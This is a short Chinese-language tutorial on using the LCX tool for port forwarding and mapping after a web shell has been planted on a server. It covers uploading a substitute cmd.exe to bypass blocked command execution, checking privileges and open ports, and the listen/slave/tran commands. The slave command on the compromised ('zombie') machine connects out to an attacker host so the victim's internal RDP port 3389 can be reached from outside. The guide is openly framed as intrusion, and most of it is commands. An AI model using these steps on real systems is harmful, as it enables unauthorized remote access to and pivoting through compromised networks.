Lcx端口转发和映射

前提：上传大马进行提权

1.点击CMD命令，输入whoami

2.显示拒绝访问,由此可以知道，系统cmd.exe不可用，可能是被删除或者是禁止掉,需要我们自己上传一个cmd.exe

3.网上下载一个cmd.exe，上传到网站可执行可读写的目录下

4.执行cmd命令，查看当前权限

5.执行netstat -an或者端口扫描，查看开发端口

Lcx.exe是一个端口转发工具，相当于把肉鸡A上的3389端口转发到具有外网IP地址的B机上，这样连接B机的3389端口就相当于链接A机的3389端口。

Lcx有两大功能，一个是端口转发(listen和slave成对使用)，另一个是端口映射(tran)。

端口转发：

Lcx -Listen <监听slave请求的端口(对应slave的第二个参数)> <等待连接的端口>

Lcx -slave <你的ip> <监听端口(对应listen的第一个参数)> <目标ip> <目标端口>

Lcx只有3种命令，常用的有2种（slave和listen）

端口转发：

第一种方法：被控机和内网上传lcx.exe

1.查找中间机的外网ip: 2.2.2.2

2.中间机监听: lcx.exe -listen 51 10000

3.内网机设置: lcx.exe -slave 2.2.2.2 51 127.0.0.1 3389

4.外网机连接被控制机的外网ip: mstsc 2.2.2.2:10000

第二种方法：内网机不能上传lcx.exe

1.确定内网ip和本地ip,不需要被控制机的ip

2.本地执行：lcx -listen 40050 10000  //监听端口，连接端口

3.被控制的计算机执行：lcx -slave 1.1.1.1 40050 10.10.0.3 3389   //监听端口，目标端口

4.用mstsc链接：127.0.0.1:10000

端口映射：

Lcx -tran <等待连接的端口> <目标ip> <目标端口>